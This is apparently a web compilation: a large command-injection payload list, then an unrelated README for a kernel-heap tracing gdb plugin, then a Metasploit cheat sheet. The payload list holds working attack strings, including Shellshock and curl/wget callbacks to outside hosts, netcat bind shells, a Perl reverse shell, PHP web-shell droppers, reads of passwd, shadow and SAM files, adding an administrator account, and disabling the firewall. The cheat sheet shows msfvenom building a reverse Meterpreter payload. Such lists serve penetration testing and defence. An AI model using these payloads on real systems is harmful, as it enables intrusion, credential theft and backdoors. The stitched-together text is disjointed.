() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("cat /etc/passwd");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
;system('cat%20/etc/passwd')
system('cat C:\boot.ini');
system('cat config.php');
system('cat /etc/passwd');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{ get_user_file("/etc/passwd") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% for c in [1,2,3] %} {{ c, c, c }} {% endfor %}
{{ [].__class__.__base__.__subclasses__() }}

References :

Testing for Command Injection (OTG-INPVAL-013)

OWASP Command Injection

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Portswigger Web Security - OS Command Injection

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/command-injection-payload-list.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/command-injection-payload-list.git


SALT - SLUB ALlocator Tracer For The Linux Kernel


Welcome to salt, a tool to reverse and learn kernel heap memory management. It can be useful to develop an exploit, to debug your own kernel code, and, more importantly, to play with the kernel heap allocations and learn its inner workings.

This tool helps trace allocations and inspect the current state of the SLUB allocator in modern Linux kernels.
It is written as a gdb plugin, and it allows you to trace and record memory allocations and to filter them by process name or by cache. The tool can also dump the list of active caches and print relevant information.
This repository also includes a playground loadable kernel module that can trigger allocations and deallocations at will, to serve both as a debugging tool and as a learning tool to better understand how the allocator works.
Here is the full list of commands:
> salt help
Possible commands:

filter -- manage filtering features by adding with one of the following arguments
enable -- enable filtering. Only information about filtered processes will be displayed
disable -- disable filtering. Information about all processes will be displayed.
status -- display current filtering parameters
add process/cache <arg>-- add one or more filtering conditions
remove process/cache <arg>-- remove one or more filtering conditions
set -- specify complex filtering rules. The supported syntax is "salt filter set (cache1 or cache2) and (process1 or process2)".
Some variations might be accepted. Checking with "salt filter status" is recommended. For simpler rules use "salt filter add".


record -- manage recording features by adding with one of the following arguments
on -- enable recording. Information about filtered processes will be added to the history
off -- disable recording.
show -- display the recorded history
clear -- delete the recorded history

trace <proc name> -- reset all filters and configure filtering for a specific process

walk -- navigate all active caches and print relevant information

walk_html -- navigate all active caches and generate relevant information in html format

walk_json -- navigate all active caches and generate relevant information in json format

help -- display this message
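A short example session with the commands documented above (the cache name and process name here are hypothetical):
(gdb) salt filter add process my_target
(gdb) salt filter add cache kmalloc-256
(gdb) salt filter enable
(gdb) salt record on
(gdb) salt record show
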
This project was developed at EURECOM as a semester project for Spring 2018.
Many thanks to my supervisors Yanick, Fabio, Emanuele, Dario, Marius, and to the rest of the S3 team that helped and followed me.

Additional Resources
Perla E, Oldani M (2010) - A Guide to Kernel Exploitation: Attacking the Core
Christopher Lameter - Slab allocators in the linux kernel
th7.cn



Metasploit Cheat Sheet


The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.

Metasploit :

Search for module:
msf > search [regex]

Specify an exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options:
msf > set [Option] [Value]

Start exploit:
msf > exploit 

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run

msfvenom :
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath]
-f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example :
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified with -f):
--help-formats - List available output formats
exe - Executable
pl - Perl
rb - Ruby
raw - Raw shellcode
c - C code
Encoding Payloads with msfvenom
